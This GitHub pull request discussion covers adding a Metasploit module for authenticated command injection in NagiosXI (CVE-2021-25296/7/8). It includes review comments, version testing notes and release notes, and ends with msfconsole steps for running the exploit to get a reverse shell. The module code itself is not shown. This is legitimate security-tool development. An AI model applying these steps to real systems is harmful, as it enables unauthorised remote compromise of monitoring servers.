-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297,CVE-2021-25298) exploit module #17494
Conversation
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
FWIW the lint failure appears to be unrelated, the error is about a file read issue and it can't be rerun |
@k0pak4 Seems like this was a GitHub cache issue that caused an issue due to missed cache hit. I reran the checks so that things should now pass. |
Thanks @gwillcox-r7 ! Normally I can rerun failed checks, but maybe I couldn't this time because it's a PR based check and not a normal branch one 🤷♂️ Appreciate the assist! |
Yeah a few of them normal people can't rerun, not sure why that one specifically was blocked but I know we had some security concerns recently about bots running automatically on code so it may have been updated as part of those set of fixes 🤷 |
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Haven't fully reviewed the check method but left some comments on what needs fixing in the meantime. Once this is fixed up I can take a look over the check
code again since the module will likely need some adjustments to fix some of the issues mentioned.
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
@gwillcox-r7 I addressed all of the PR comments except for testing prior NagiosXI versions. I'll do that today but wanted to push the rest up in the meantime. If older versions hit, I'll update the code & docs to reflect that. The biggest changes are: adding |
Thanks @k0pak4 will go through this now and review 👍 |
Thanks @gwillcox-r7 . Turns out it's actually vulnerable from 5.5.6 to 5.7.5. Before 5.5.8, the ip_address parameter is named address, so I had to re-work some of the check to have authenticate also set the version string since it has the response body available. Thanks for the suggestion to check older versions! I'll send in update requests for the CVEs to reflect that. |
Awesome, glad to hear you were able to get this working with more versions! 😄 |
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
@k0pak4 Looks like most comments were resolved. Still have an outstanding concern r.e the |
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
@gwillcox-r7 I addressed all the requested changes I think. I tested the module again as well after all the changes. The documentation should be more thorough on the installs, and the check/authenticate should give more detailed statuses and error messages by propagating the ones returned from nagios_xi_login. I also added the requested checks for nil values, etc. so it should be more resilient |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
A few comments from reviewing the PR comments I left.
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
Alright I think this should be ready for testing, just going over the 4 commits you made to see if there is anything I might have missed, and then will set up a target and test the module against it. Thanks for all the effort you put into this, at over 100 comments I know this is growing a bit long in the tooth but should get this landed soon 👍 |
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
I think the module is in a much better place now, I appreciate the thorough and detailed reviews. I checked the other authenticated NagiosXI modules and they could take advantage of some of the suggestions and updates made to this module, so I opened an issue for it (#17606). Given that a lot of the code could be reused during fixing, and that NagiosXI is fairly easy to install even older versions, it's probably a good candidate to be labeled newbie-friendly |
Thanks added the newbie-friendly and easy tags so it should be easier for those new to Metasploit to work on this 👍 |
Fixed a few issues I noticed in the docs review, namely some incorrect CVE numbers due to me switching some of the numbers around, and an update to accommodate the 5.5.7 point on the parameter name changing. Still need to add a scenario for 5.5.6 so we have our range of testing to claim we cover the versions we claim to target; atm we just have 5.7.5 as tested in the documentation. |
Good point. I have 5.5.6 installed currently so just added a scenario for it, specifically with CVE-2021-25297 since it uses a different parameter in that version, so is a better representative example |
Thanks for the example addition @k0pak4! |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Some minor changes left I noticed. I'll try fix these up where I can though, but this should be last of it for real this time.
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
Outdated
Show resolved
Hide resolved
Add initial module
Fix CVE format Add Documentation
… and fix a bug in the code
90785d5
to
52fa2e5
Compare
This should be good to land once tests pass. I addressed the updates from above in the last commit then squashed things down to remove all the references to fixes. Tried to keep the commit messages for those fixes that were important and well described. Thanks for PRing this @k0pak4 and appreciate your help on all this! |
Thanks for the thorough PR, I know it was a lot of changes so I appreciate it 🎉 Thanks for tidying up the commit history too, it was certainly getting messy |
Release NotesA new authenticated RCE module for NagiosXI has been added which exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298 to get a shell as the |
This PR adds an exploit module for three CVEs (CVE-2021-25296, CVE-2021-25297, CVE-2021-25298) that perform command injection against NagiosXI 5.7.5. It utilizes the Nagios login mixin for target verification and authentication.
Verification
msfconsole
use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
set RHOSTS TARGET_IP
set RPORT 443
set SSL true
set USERNAME USER
set PASSWORD PASSWORD
set TARGET_URL_PARAM plugin_output_len
set LHOST YOUR_IP
set LPORT YOUR_LISTENING_PORT
run
Vulnerable Software
The easiest way to test is against the official OVA (https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).) but installing it manually on linux is also an option.